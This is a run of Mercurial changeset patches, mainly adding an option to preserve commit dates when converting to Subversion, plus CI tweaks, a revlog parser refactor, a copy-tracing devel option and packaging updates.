dates, + forcefully setting ``svn:date`` revision properties. This option is + DANGEROUS and may break some subversion functionality for the resulting + repository (e.g. filtering revisions with date ranges in ``svn log``), + as original commit dates are not guaranteed to be monotonically + increasing. + + For commit dates setting to work destination repository must have + ``pre-revprop-change`` hook configured to allow setting of ``svn:date`` + revision properties. See Subversion documentation for more details. """ return convcmd.convert(ui, src, dest, revmapfile, **opts) diff --git a/hgext/convert/subversion.py b/hgext/convert/subversion.py --- a/hgext/convert/subversion.py +++ b/hgext/convert/subversion.py @@ -97,6 +97,17 @@ return s.decode(fsencoding).encode('utf-8') +def formatsvndate(date): + return dateutil.datestr(date, b'%Y-%m-%dT%H:%M:%S.000000Z') + + +def parsesvndate(s): + # Example SVN datetime. 
Includes microseconds. + # ISO-8601 conformant + # '2007-01-04T17:35:00.902377Z' + return dateutil.parsedate(s[:19] + b' UTC', [b'%Y-%m-%dT%H:%M:%S']) + + class SvnPathNotFound(Exception): pass @@ -1158,12 +1169,7 @@ continue paths.append((path, ent)) - # Example SVN datetime. Includes microseconds. - # ISO-8601 conformant - # '2007-01-04T17:35:00.902377Z' - date = dateutil.parsedate( - date[:19] + b" UTC", [b"%Y-%m-%dT%H:%M:%S"] - ) + date = parsesvndate(date) if self.ui.configbool(b'convert', b'localtimezone'): date = makedatetimestamp(date[0]) @@ -1380,7 +1386,7 @@ return logstream(stdout) -pre_revprop_change = b'''#!/bin/sh +pre_revprop_change_template = b'''#!/bin/sh REPOS="$1" REV="$2" @@ -1388,15 +1394,26 @@ PROPNAME="$4" ACTION="$5" -if [ "$ACTION" = "M" -a "$PROPNAME" = "svn:log" ]; then exit 0; fi -if [ "$ACTION" = "A" -a "$PROPNAME" = "hg:convert-branch" ]; then exit 0; fi -if [ "$ACTION" = "A" -a "$PROPNAME" = "hg:convert-rev" ]; then exit 0; fi +%(rules)s echo "Changing prohibited revision property" >&2 exit 1 ''' +def gen_pre_revprop_change_hook(prop_actions_allowed): + rules = [] + for action, propname in prop_actions_allowed: + rules.append( + ( + b'if [ "$ACTION" = "%s" -a "$PROPNAME" = "%s" ]; ' + b'then exit 0; fi' + ) + % (action, propname) + ) + return pre_revprop_change_template % {b'rules': b'\n'.join(rules)} + + class svn_sink(converter_sink, commandline): commit_re = re.compile(br'Committed revision (\d+).', re.M) uuid_re = re.compile(br'Repository UUID:\s*(\S+)', re.M) @@ -1470,9 +1487,20 @@ self.is_exec = None if created: + prop_actions_allowed = [ + (b'M', b'svn:log'), + (b'A', b'hg:convert-branch'), + (b'A', b'hg:convert-rev'), + ] + + if self.ui.configbool( + b'convert', b'svn.dangerous-set-commit-dates' + ): + prop_actions_allowed.append((b'M', b'svn:date')) + hook = os.path.join(created, b'hooks', b'pre-revprop-change') fp = open(hook, b'wb') - fp.write(pre_revprop_change) + fp.write(gen_pre_revprop_change_hook(prop_actions_allowed)) 
fp.close() util.setflags(hook, False, True) @@ -1667,6 +1695,23 @@ revprop=True, revision=rev, ) + + if self.ui.configbool( + b'convert', b'svn.dangerous-set-commit-dates' + ): + # Subverson always uses UTC to represent date and time + date = dateutil.parsedate(commit.date) + date = (date[0], 0) + + # The only way to set date and time for svn commit is to use propset after commit is done + self.run( + b'propset', + b'svn:date', + formatsvndate(date), + revprop=True, + revision=rev, + ) + for parent in parents: self.addchild(parent, rev) return self.revid(rev) diff --git a/mercurial/configitems.py b/mercurial/configitems.py --- a/mercurial/configitems.py +++ b/mercurial/configitems.py @@ -570,6 +570,11 @@ default=0, ) coreconfigitem( + b'convert', + b'svn.dangerous-set-commit-dates', + default=False, +) +coreconfigitem( b'debug', b'dirstate.delaywrite', default=0, diff --git a/tests/svnxml.py b/tests/svnxml.py --- a/tests/svnxml.py +++ b/tests/svnxml.py @@ -15,6 +15,7 @@ e['revision'] = entry.getAttribute('revision') e['author'] = xmltext(entry.getElementsByTagName('author')[0]) e['msg'] = xmltext(entry.getElementsByTagName('msg')[0]) + e['date'] = xmltext(entry.getElementsByTagName('date')[0]) e['paths'] = [] paths = entry.getElementsByTagName('paths') if paths: @@ -42,7 +43,7 @@ except AttributeError: fp = sys.stdout for e in entries: - for k in ('revision', 'author', 'msg'): + for k in ('revision', 'author', 'date', 'msg'): fp.write(('%s: %s\n' % (k, e[k])).encode('utf-8')) for path, action, fpath, frev in sorted(e['paths']): frominfo = b'' diff --git a/tests/test-convert-svn-sink.t b/tests/test-convert-svn-sink.t --- a/tests/test-convert-svn-sink.t +++ b/tests/test-convert-svn-sink.t @@ -54,10 +54,12 @@ 2 2 test a revision: 2 author: test + date: * (glob) msg: modify a file M /a revision: 1 author: test + date: * (glob) msg: add a file A /a A /d1 @@ -95,6 +97,7 @@ 3 3 test b revision: 3 author: test + date: * (glob) msg: rename a file D /a A /b (from /a@2) @@ 
-131,6 +134,7 @@ 4 4 test c revision: 4 author: test + date: * (glob) msg: copy a file A /c (from /b@3) $ ls a a-hg-wc @@ -167,6 +171,7 @@ 5 5 test . revision: 5 author: test + date: * (glob) msg: remove a file D /b $ ls a a-hg-wc @@ -209,6 +214,7 @@ 6 6 test c revision: 6 author: test + date: * (glob) msg: make a file executable M /c #if execbit @@ -247,6 +253,7 @@ 8 8 test newlink revision: 8 author: test + date: * (glob) msg: move symlink D /link A /newlink (from /link@7) @@ -278,6 +285,7 @@ 7 7 test f revision: 7 author: test + date: * (glob) msg: f D /c A /d @@ -315,6 +323,7 @@ 1 1 test d1/a revision: 1 author: test + date: * (glob) msg: add executable file in new directory A /d1 A /d1/a @@ -343,6 +352,7 @@ 2 2 test d2/a revision: 2 author: test + date: * (glob) msg: copy file to new directory A /d2 A /d2/a (from /d1/a@1) @@ -416,21 +426,25 @@ 4 4 test right-2 revision: 4 author: test + date: * (glob) msg: merge A /right-1 A /right-2 revision: 3 author: test + date: * (glob) msg: left-2 M /b A /left-2 revision: 2 author: test + date: * (glob) msg: left-1 M /b A /left-1 revision: 1 author: test + date: * (glob) msg: base A /b @@ -459,10 +473,12 @@ 2 2 test .hgtags revision: 2 author: test + date: * (glob) msg: Tagged as v1.0 A /.hgtags revision: 1 author: test + date: * (glob) msg: Add file a A /a $ rm -rf a a-hg a-hg-wc @@ -494,10 +510,12 @@ 2 2 test exec revision: 2 author: test + date: * (glob) msg: remove executable bit M /exec revision: 1 author: test + date: * (glob) msg: create executable A /exec $ test ! 
-x a-hg-wc/exec @@ -540,11 +558,77 @@ 2 2 test b revision: 2 author: test + date: * (glob) msg: Another change A /b revision: 1 author: test + date: * (glob) msg: Some change A /a $ rm -rf a a-hg a-hg-wc + +Commit dates conversion + + $ hg init a + + $ echo a >> a/a + $ hg add a + adding a/a + $ hg --cwd a ci -d '1 0' -A -m 'Change 1' + + $ echo a >> a/a + $ hg --cwd a ci -d '2 0' -m 'Change 2' + + $ echo a >> a/a + $ hg --cwd a ci -d '2 0' -m 'Change at the same time' + + $ echo a >> a/a + $ hg --cwd a ci -d '1 0' -m 'Change in the past' + + $ echo a >> a/a + $ hg --cwd a ci -d '3 0' -m 'Change in the future' + + $ hg convert --config convert.svn.dangerous-set-commit-dates=true -d svn a + assuming destination a-hg + initializing svn repository 'a-hg' + initializing svn working copy 'a-hg-wc' + scanning source... + sorting... + converting... + 4 Change 1 + 3 Change 2 + 2 Change at the same time + 1 Change in the past + 0 Change in the future + $ svnupanddisplay a-hg-wc 0 + 5 5 test . + 5 5 test a + revision: 5 + author: test + date: 1970-01-01T00:00:03.000000Z + msg: Change in the future + M /a + revision: 4 + author: test + date: 1970-01-01T00:00:01.000000Z + msg: Change in the past + M /a + revision: 3 + author: test + date: 1970-01-01T00:00:02.000000Z + msg: Change at the same time + M /a + revision: 2 + author: test + date: 1970-01-01T00:00:02.000000Z + msg: Change 2 + M /a + revision: 1 + author: test + date: 1970-01-01T00:00:01.000000Z + msg: Change 1 + A /a + + $ rm -rf a a-hg a-hg-wc diff --git a/tests/test-convert.t b/tests/test-convert.t --- a/tests/test-convert.t +++ b/tests/test-convert.t @@ -388,6 +388,23 @@ does not convert tags from the source repo to the target repo. The default is False. + Subversion Destination + ###################### + + Original commit dates are not preserved by default. + + convert.svn.dangerous-set-commit-dates + preserve original commit dates, forcefully setting + "svn:date" revision properties.
This option is DANGEROUS and + may break some subversion functionality for the resulting + repository (e.g. filtering revisions with date ranges in + "svn log"), as original commit dates are not guaranteed to + be monotonically increasing. + + For commit dates setting to work destination repository must have "pre- + revprop-change" hook configured to allow setting of "svn:date" revision + properties. See Subversion documentation for more details. + options ([+] can be repeated): -s --source-type TYPE source repository type # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611759212 -3600 # Wed Jan 27 15:53:32 2021 +0100 # Node ID 2aef69e8efbb477959f182e9df19b0e9637f5e6d # Parent 7525e77b5eac36f88b655a6067fe1969af733003 heptapod-ci: add a default value for HG_CI_IMAGE_TAG Differential Revision: https://phab.mercurial-scm.org/D9886 diff --git a/contrib/heptapod-ci.yml b/contrib/heptapod-ci.yml --- a/contrib/heptapod-ci.yml +++ b/contrib/heptapod-ci.yml @@ -7,6 +7,7 @@ variables: PYTHON: python TEST_HGMODULEPOLICY: "allow" + HG_CI_IMAGE_TAG: "latest" .runtests_template: &runtests stage: tests # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611755840 -3600 # Wed Jan 27 14:57:20 2021 +0100 # Node ID 6b0dac9f650afb548bb2d2a17d3fb0c49f231e6a # Parent 2aef69e8efbb477959f182e9df19b0e9637f5e6d heptapod-ci: indicate which version of black is used for the run This will help understand possible mismatch Differential Revision: https://phab.mercurial-scm.org/D9887 diff --git a/contrib/heptapod-ci.yml b/contrib/heptapod-ci.yml --- a/contrib/heptapod-ci.yml +++ b/contrib/heptapod-ci.yml @@ -20,6 +20,7 @@ - cargo build - cd /tmp/mercurial-ci/ - ls -1 tests/test-check-*.* > /tmp/check-tests.txt + - black --version script: - echo "python used, $PYTHON" - echo "$RUNTEST_ARGS" # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611755904 -3600 # Wed Jan 27 14:58:24 2021 +0100 # 
Node ID 959d581bb62560434452bb694e6b063d0fc29e9f # Parent 6b0dac9f650afb548bb2d2a17d3fb0c49f231e6a black: show required version in skip message This will help people to configure their black Differential Revision: https://phab.mercurial-scm.org/D9888 diff --git a/tests/hghave.py b/tests/hghave.py --- a/tests/hghave.py +++ b/tests/hghave.py @@ -1054,7 +1054,7 @@ return matchoutput('emacs --version', b'GNU Emacs 2(4.4|4.5|5|6|7|8|9)') -@check('black', 'the black formatter for python') +@check('black', 'the black formatter for python (>= 20.8b1)') def has_black(): blackcmd = 'black --version' version_regex = b'black, version ([0-9a-b.]+)' # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611756288 -3600 # Wed Jan 27 15:04:48 2021 +0100 # Node ID a390c7fcd28605d6f7be5bcad910badd602bd9ca # Parent 959d581bb62560434452bb694e6b063d0fc29e9f heptapod-ci: indicate which version of clang-format is used for the run This will help understand possible mismatch Differential Revision: https://phab.mercurial-scm.org/D9889 diff --git a/contrib/heptapod-ci.yml b/contrib/heptapod-ci.yml --- a/contrib/heptapod-ci.yml +++ b/contrib/heptapod-ci.yml @@ -21,6 +21,7 @@ - cd /tmp/mercurial-ci/ - ls -1 tests/test-check-*.* > /tmp/check-tests.txt - black --version + - clang-format --version script: - echo "python used, $PYTHON" - echo "$RUNTEST_ARGS" # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611756362 -3600 # Wed Jan 27 15:06:02 2021 +0100 # Node ID 9fd4f7af42ea806d3aa77beb1dbbf806dee75306 # Parent a390c7fcd28605d6f7be5bcad910badd602bd9ca clang-format: show required version in skip message This will help people to configure their clang-format Differential Revision: https://phab.mercurial-scm.org/D9890 diff --git a/tests/hghave.py b/tests/hghave.py --- a/tests/hghave.py +++ b/tests/hghave.py @@ -591,7 +591,7 @@ return matchoutput("pylint --help", br"Usage:[ ]+pylint", True) -@check("clang-format", "clang-format C code
formatter") +@check("clang-format", "clang-format C code formatter (>= 11)") def has_clang_format(): m = matchoutput('clang-format --version', br'clang-format version (\d+)') # style changed somewhere between 10.x and 11.x # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1611843168 -3600 # Thu Jan 28 15:12:48 2021 +0100 # Node ID 95054317e1722c5d22c4c8d03eccbf83acb4f78d # Parent 9fd4f7af42ea806d3aa77beb1dbbf806dee75306 revlog: use a less probable revlog version for backwards compatibility This allows us to define a usable v2. Differential Revision: https://phab.mercurial-scm.org/D9902 diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -3639,11 +3639,11 @@ # effectively locks out old clients and prevents them from # mucking with a repo in an unknown format. # - # The revlog header has version 2, which won't be recognized by + # The revlog header has version 65535, which won't be recognized by # such old clients. hgvfs.append( b'00changelog.i', - b'\0\0\0\2 dummy changelog to prevent using the old repo ' + b'\0\0\xFF\xFF dummy changelog to prevent using the old repo ' b'layout', ) diff --git a/tests/test-requires.t b/tests/test-requires.t --- a/tests/test-requires.t +++ b/tests/test-requires.t @@ -5,7 +5,7 @@ $ hg commit -m test $ rm .hg/requires $ hg tip - abort: unknown version (2) in revlog 00changelog.i + abort: unknown version (65535) in revlog 00changelog.i [50] $ echo indoor-pool > .hg/requires $ hg tip # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1611843993 -3600 # Thu Jan 28 15:26:33 2021 +0100 # Node ID 095fa99ae5f5f0c6b30a442b38e5188fd18a8cef # Parent 95054317e1722c5d22c4c8d03eccbf83acb4f78d revlog: prepare pure parser for being overloaded The current class uses module-level variables which don't allow for reusing the current logic for a slightly different revlog version. 
Differential Revision: https://phab.mercurial-scm.org/D9903 diff --git a/mercurial/pure/parsers.py b/mercurial/pure/parsers.py --- a/mercurial/pure/parsers.py +++ b/mercurial/pure/parsers.py @@ -33,13 +33,6 @@ return x -indexformatng = b">Qiiiiii20s12x" -indexfirst = struct.calcsize(b'Q') -sizeint = struct.calcsize(b'i') -indexsize = struct.calcsize(indexformatng) -nullitem = (0, 0, 0, -1, -1, -1, -1, nullid) - - def gettype(q): return int(q & 0xFFFF) @@ -49,6 +42,12 @@ class BaseIndexObject(object): + index_format = b">Qiiiiii20s12x" + big_int_size = struct.calcsize(b'Q') + int_size = struct.calcsize(b'i') + index_size = struct.calcsize(index_format) + null_item = (0, 0, 0, -1, -1, -1, -1, nullid) + @property def nodemap(self): msg = b"index.nodemap is deprecated, use index.[has_node|rev|get_rev]" @@ -94,7 +93,7 @@ def append(self, tup): if '_nodemap' in vars(self): self._nodemap[tup[7]] = len(self) - data = _pack(indexformatng, *tup) + data = _pack(self.index_format, *tup) self._extra.append(data) def _check_index(self, i): @@ -105,14 +104,14 @@ def __getitem__(self, i): if i == -1: - return nullitem + return self.null_item self._check_index(i) if i >= self._lgt: data = self._extra[i - self._lgt] else: index = self._calculate_index(i) - data = self._data[index : index + indexsize] - r = _unpack(indexformatng, data) + data = self._data[index : index + self.index_size] + r = _unpack(self.index_format, data) if self._lgt and i == 0: r = (offset_type(0, gettype(r[0])),) + r[1:] return r @@ -120,13 +119,13 @@ class IndexObject(BaseIndexObject): def __init__(self, data): - assert len(data) % indexsize == 0 + assert len(data) % self.index_size == 0 self._data = data - self._lgt = len(data) // indexsize + self._lgt = len(data) // self.index_size self._extra = [] def _calculate_index(self, i): - return i * indexsize + return i * self.index_size def __delitem__(self, i): if not isinstance(i, slice) or not i.stop == -1 or i.step is not None: @@ -135,7 +134,7 @@ 
self._check_index(i) self._stripnodes(i) if i < self._lgt: - self._data = self._data[: i * indexsize] + self._data = self._data[: i * self.index_size] self._lgt = i self._extra = [] else: @@ -198,14 +197,16 @@ if lgt is not None: self._offsets = [0] * lgt count = 0 - while off <= len(self._data) - indexsize: + while off <= len(self._data) - self.index_size: + start = off + self.big_int_size (s,) = struct.unpack( - b'>i', self._data[off + indexfirst : off + sizeint + indexfirst] + b'>i', + self._data[start : start + self.int_size], ) if lgt is not None: self._offsets[count] = off count += 1 - off += indexsize + s + off += self.index_size + s if off != len(self._data): raise ValueError(b"corrupted data") return count # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1610751798 -3600 # Sat Jan 16 00:03:18 2021 +0100 # Node ID e948ad0dcbe2dbea1cd7d2acfdd37348f6f15f60 # Parent 095fa99ae5f5f0c6b30a442b38e5188fd18a8cef copies: add a devel option to trace all files Filelog-based copy tracing only traces copies for files that have been added. This is a trade-off: skipping some rare copy cases in exchange for avoiding atrocious-to-the-point-of-unusable performance. The changeset-centric copy tracing does not need this trade-off and naturally traces all copies, including the ones involving non-new files. In order to ease the comparison between both algorithms, we add a small devel option to trace copies for all files in the target revisions.
Differential Revision: https://phab.mercurial-scm.org/D9796 diff --git a/mercurial/configitems.py b/mercurial/configitems.py --- a/mercurial/configitems.py +++ b/mercurial/configitems.py @@ -615,6 +615,12 @@ b'check-relroot', default=False, ) +# Track copy information for all file, not just "added" one (very slow) +coreconfigitem( + b'devel', + b'copy-tracing.trace-all-files', + default=False, +) coreconfigitem( b'devel', b'default-date', diff --git a/mercurial/copies.py b/mercurial/copies.py --- a/mercurial/copies.py +++ b/mercurial/copies.py @@ -152,13 +152,21 @@ if b.p1() == a and b.p2().node() == nullid: filesmatcher = matchmod.exact(b.files()) forwardmissingmatch = matchmod.intersectmatchers(match, filesmatcher) - missing = _computeforwardmissing(a, b, match=forwardmissingmatch) + if repo.ui.configbool(b'devel', b'copy-tracing.trace-all-files'): + missing = list(b.walk(match)) + # _computeforwardmissing(a, b, match=forwardmissingmatch) + if debug: + dbg(b'debug.copies: searching all files: %d\n' % len(missing)) + else: + missing = _computeforwardmissing(a, b, match=forwardmissingmatch) + if debug: + dbg( + b'debug.copies: missing files to search: %d\n' + % len(missing) + ) ancestrycontext = a._repo.changelog.ancestors([b.rev()], inclusive=True) - if debug: - dbg(b'debug.copies: missing files to search: %d\n' % len(missing)) - for f in sorted(missing): if debug: dbg(b'debug.copies: tracing file: %s\n' % f) diff --git a/tests/test-copies.t b/tests/test-copies.t --- a/tests/test-copies.t +++ b/tests/test-copies.t @@ -95,6 +95,8 @@ x -> y $ hg debugpathcopies 0 1 x -> y (no-filelog !) + $ hg debugpathcopies 0 1 --config devel.copy-tracing.trace-all-files=yes + x -> y Copy a file onto another file with same content. If metadata is stored in changeset, this does not produce a new filelog entry. The changeset's "files" entry should still list the file. @@ -113,6 +115,8 @@ x -> x2 $ hg debugpathcopies 0 1 x -> x2 (no-filelog !) 
+ $ hg debugpathcopies 0 1 --config devel.copy-tracing.trace-all-files=yes + x -> x2 Rename file in a loop: x->y->z->x $ newrepo diff --git a/tests/test-copy.t b/tests/test-copy.t --- a/tests/test-copy.t +++ b/tests/test-copy.t @@ -228,6 +228,17 @@ should show no copies $ hg st -C +note: since filelog based copy tracing only trace copy for new file, the copy information here is not displayed. + + $ hg status --copies --change . + M bar + +They are a devel option to walk all file and fine this information anyway. + + $ hg status --copies --change . --config devel.copy-tracing.trace-all-files=yes + M bar + foo + copy --after on an added file $ cp bar baz $ hg add baz # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1611814257 28800 # Wed Jan 27 22:10:57 2021 -0800 # Node ID 29e3e46b0a22e02a90583116f52d713090dc983b # Parent e948ad0dcbe2dbea1cd7d2acfdd37348f6f15f60 narrow: delete a stale TODO about not sending groups the client already has 2c5835b4246b changed the changegroup generation to not send treemanifests for directories the client had before widening. As that commit mentions, we had already stopped before that commit to send the changelog and filelogs for files the client already had. Differential Revision: https://phab.mercurial-scm.org/D9898 diff --git a/mercurial/bundle2.py b/mercurial/bundle2.py --- a/mercurial/bundle2.py +++ b/mercurial/bundle2.py @@ -2536,8 +2536,6 @@ for r in repo.revs(b"::%ln", common): commonnodes.add(cl.node(r)) if commonnodes: - # XXX: we should only send the filelogs (and treemanifest). 
user - # already has the changelog and manifest packer = changegroup.getbundler( cgversion, repo, # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1611821655 28800 # Thu Jan 28 00:14:15 2021 -0800 # Node ID 892eb7c5edaaeb768e3ae7099e8271e68b937280 # Parent 29e3e46b0a22e02a90583116f52d713090dc983b copies: fix an incorrect comment in graftcopies() from recent D9802 I don't think the bit about creating a merge in the filelog was correct. Or at least I couldn't find a case where it happened. Differential Revision: https://phab.mercurial-scm.org/D9899 diff --git a/mercurial/copies.py b/mercurial/copies.py --- a/mercurial/copies.py +++ b/mercurial/copies.py @@ -1229,8 +1229,11 @@ new_copies = pathcopies(base, ctx) parent = wctx.p1() _filter(parent, wctx, new_copies) - # extra filtering to drop copy information for files that existed before - # the graft (otherwise we would create merge filelog for non-merge commit + # Extra filtering to drop copy information for files that existed before + # the graft. This is to handle the case of grafting a rename onto a commit + # that already has the rename. Otherwise the presence of copy information + # would result in the creation of an empty commit where we would prefer to + # not create one. 
for dest, __ in list(new_copies.items()): if dest in parent: del new_copies[dest] # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1611921729 -19800 # Fri Jan 29 17:32:09 2021 +0530 # Node ID 16c18d5e5dc88810d3410d9370cb851f508ffbf5 # Parent 892eb7c5edaaeb768e3ae7099e8271e68b937280 # Parent ed43b6fa847e57e61987dd3cea92b50fdbce6064 merge with stable diff --git a/contrib/automation/hgautomation/linux.py b/contrib/automation/hgautomation/linux.py --- a/contrib/automation/hgautomation/linux.py +++ b/contrib/automation/hgautomation/linux.py @@ -75,7 +75,7 @@ sudo -H -u hg -g hg /home/hg/.cargo/bin/rustup install 1.31.1 1.46.0 sudo -H -u hg -g hg /home/hg/.cargo/bin/rustup component add clippy -sudo -H -u hg -g hg /home/hg/.cargo/bin/cargo install --version 0.9.0 pyoxidizer +sudo -H -u hg -g hg /home/hg/.cargo/bin/cargo install --version 0.10.3 pyoxidizer ''' diff --git a/contrib/heptapod-ci.yml b/contrib/heptapod-ci.yml --- a/contrib/heptapod-ci.yml +++ b/contrib/heptapod-ci.yml @@ -16,8 +16,6 @@ before_script: - hg clone . /tmp/mercurial-ci/ --noupdate --config phases.publish=no - hg -R /tmp/mercurial-ci/ update `hg log --rev '.' --template '{node}'` - - cd /tmp/mercurial-ci/rust/rhg - - cargo build - cd /tmp/mercurial-ci/ - ls -1 tests/test-check-*.* > /tmp/check-tests.txt - black --version @@ -27,6 +25,17 @@ - echo "$RUNTEST_ARGS" - HGMODULEPOLICY="$TEST_HGMODULEPOLICY" "$PYTHON" tests/run-tests.py --color=always $RUNTEST_ARGS + +.rust_template: &rust + before_script: + - hg clone . /tmp/mercurial-ci/ --noupdate --config phases.publish=no + - hg -R /tmp/mercurial-ci/ update `hg log --rev '.' 
--template '{node}'` + - ls -1 tests/test-check-*.* > /tmp/check-tests.txt + - cd /tmp/mercurial-ci/rust/rhg + - cargo build + - cd /tmp/mercurial-ci/ + + checks-py2: <<: *runtests variables: @@ -83,6 +92,7 @@ test-py2-rust: <<: *runtests + <<: *rust variables: HGWITHRUSTEXT: cpython RUNTEST_ARGS: "--rust --blacklist /tmp/check-tests.txt" @@ -90,6 +100,7 @@ test-py3-rust: <<: *runtests + <<: *rust variables: HGWITHRUSTEXT: cpython RUNTEST_ARGS: "--rust --blacklist /tmp/check-tests.txt" diff --git a/contrib/install-windows-dependencies.ps1 b/contrib/install-windows-dependencies.ps1 --- a/contrib/install-windows-dependencies.ps1 +++ b/contrib/install-windows-dependencies.ps1 @@ -125,7 +125,7 @@ Invoke-Process "${prefix}\cargo\bin\rustup.exe" "component add clippy" # Install PyOxidizer for packaging. - Invoke-Process "${prefix}\cargo\bin\cargo.exe" "install --version 0.9.0 pyoxidizer" + Invoke-Process "${prefix}\cargo\bin\cargo.exe" "install --version 0.10.3 pyoxidizer" } function Install-Dependencies($prefix) { diff --git a/contrib/packaging/debian/copyright b/contrib/packaging/debian/copyright --- a/contrib/packaging/debian/copyright +++ b/contrib/packaging/debian/copyright @@ -3,7 +3,7 @@ Source: https://www.mercurial-scm.org/ Files: * -Copyright: 2005-2020, Matt Mackall <mpm@selenic.com> and others. +Copyright: 2005-2021, Matt Mackall <mpm@selenic.com> and others. 
License: GPL-2+ This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public diff --git a/contrib/packaging/hgpackaging/inno.py b/contrib/packaging/hgpackaging/inno.py --- a/contrib/packaging/hgpackaging/inno.py +++ b/contrib/packaging/hgpackaging/inno.py @@ -33,6 +33,11 @@ 'win32ctypes', } +EXTRA_INCLUDES = { + '_curses', + '_curses_panel', +} + EXTRA_INSTALL_RULES = [ ('contrib/win32/mercurial.ini', 'defaultrc/mercurial.rc'), ] @@ -78,6 +83,7 @@ 'inno', requirements_txt, extra_packages=EXTRA_PACKAGES, + extra_includes=EXTRA_INCLUDES, ) # Purge the staging directory for every build so packaging is diff --git a/contrib/packaging/hgpackaging/py2exe.py b/contrib/packaging/hgpackaging/py2exe.py --- a/contrib/packaging/hgpackaging/py2exe.py +++ b/contrib/packaging/hgpackaging/py2exe.py @@ -67,6 +67,7 @@ extra_excludes=None, extra_dll_excludes=None, extra_packages_script=None, + extra_includes=None, ): """Build Mercurial with py2exe. @@ -176,6 +177,8 @@ ) if hgext3rd_extras: env['HG_PY2EXE_EXTRA_INSTALL_PACKAGES'] = ' '.join(hgext3rd_extras) + if extra_includes: + env['HG_PY2EXE_EXTRA_INCLUDES'] = ' '.join(sorted(extra_includes)) if extra_excludes: env['HG_PY2EXE_EXTRA_EXCLUDES'] = ' '.join(sorted(extra_excludes)) if extra_dll_excludes: diff --git a/contrib/packaging/hgpackaging/wix.py b/contrib/packaging/hgpackaging/wix.py --- a/contrib/packaging/hgpackaging/wix.py +++ b/contrib/packaging/hgpackaging/wix.py @@ -39,6 +39,10 @@ 'win32ctypes', } +EXTRA_INCLUDES = { + '_curses', + '_curses_panel', +} EXTRA_INSTALL_RULES = [ ('contrib/packaging/wix/COPYING.rtf', 'COPYING.rtf'), @@ -330,6 +334,7 @@ requirements_txt, extra_packages=EXTRA_PACKAGES, extra_packages_script=extra_packages_script, + extra_includes=EXTRA_INCLUDES, ) build_dir = hg_build_dir / ('wix-%s' % arch) diff --git a/contrib/packaging/inno/mercurial.iss b/contrib/packaging/inno/mercurial.iss --- a/contrib/packaging/inno/mercurial.iss +++ 
b/contrib/packaging/inno/mercurial.iss @@ -6,7 +6,7 @@ #endif [Setup] -AppCopyright=Copyright 2005-2020 Matt Mackall and others +AppCopyright=Copyright 2005-2021 Matt Mackall and others AppName=Mercurial AppVersion={#VERSION} OutputBaseFilename=Mercurial-{#VERSION}{#SUFFIX} @@ -29,7 +29,7 @@ DefaultDirName={pf}\Mercurial SourceDir=stage VersionInfoDescription=Mercurial distributed SCM (version {#VERSION}) -VersionInfoCopyright=Copyright 2005-2020 Matt Mackall and others +VersionInfoCopyright=Copyright 2005-2021 Matt Mackall and others VersionInfoCompany=Matt Mackall and others VersionInfoVersion={#QUAD_VERSION} InternalCompressLevel=max diff --git a/contrib/packaging/wix/COPYING.rtf b/contrib/packaging/wix/COPYING.rtf index fc98ff56d9794ed561e92196cf4ec116b680532f..8bca18aa4dbe55caca8ffb71d89f9d31d2e02413 GIT binary patch literal 1792 zc$|$?!EW0)5Z!Zt{KKG^Z5LigQj<g1iv_$z(ilygz;RFn;DsVb)@&(KA%_+W!~edZ zEH^G1boU}z^zgkmZyvc7o~v9)8>oM%c9j<wh0s`4nXoRBa!o5aEf{H6c~+cnMdd7W zX||%uL}kf{O4ZT_<P4V7V1PMxuyBpElilw0WGj?2&U0yCB0TC$tURL4L}?-x7Z;Ph z<~OlIi(azxupm{VE;7ioaW>9BWas%#tO>iXWc9g-Du>e((Mqp{p^Ll_zJCT&oM$4K zCK}Gg^FO`5P-J2+{r!8mMX#bKX+ZocKR}UX7rz%-k;AQIhFht=N@GA;4UTK{A#v=P zPEU>*^PVvmK^9r|1Md+H1*kkC1Xpn<Jx*ZbA}DFWqo%-~%E$=BiS*2QXq={MlNO@Y z=z(hlM&AT*RsZp6{s^CXrwrW3(vX51QfLE$4A7>PP@{%&)0bZ*_J@HTu3WTQGC4Z| zq|_p;(FbxCiUYxbHUj72t>h%wgKN{KcOdNsjO3Sn<Gne{8lm-W<z*8fF}*aWfou<4 zyB2|K$?0nY9T@{9LJU|%GlDWQe3>n;?;e*hoj<{s>0&XRFP|pR5!Ws<;2QTx)U<|B zLnpnLmN!ZI?d9U*^>n_R{yn>yEuWJ5tJ!jX`S1W&cMF)p{dBRMeSEx`F5v!gaew!4 zIcT3*u&xJBrW*_aJU&PAdlzNf8d9<}2u5}ZSEl@GV3#`UJTckTzMW)`a_z>`s%EI2 z(dc_4(;t1Lpp~9C(A5qaxjBq`82)#e;3G>%$tXj;2zGsjD(6AVMy@c7fUGi6CmD%o ze~`=wLW_#h53-6hT9zh>QO*W@j%YbWbN~VADI|pC^bmy@Fx8WlB^lyP;!bPF(%|h2 zc^aX042Bv?gJ%cEg+97kvP@Y0yTnxOF(tguhg2$h$vs=zfdN7cEXnR?kQ#RBFp$^1 zgM^{C6)H(4dORrprivZ7HeDy!$LDweL&>|*K2TIah^ii@l~9idRm%V+q6Mkf6i|O7 zav{**iW?9HCx=))ApX~ZO*3p<IxWbO%wgw~ix6rTjfPsT5j-lSHENK3xc<*gU|b(b zu9Iis(DNiUYaNduAi|&9t*8i%PM2?GG}*x0>!<t6#m#K~8Q#>)?H^}nUDu6QHjbTN 
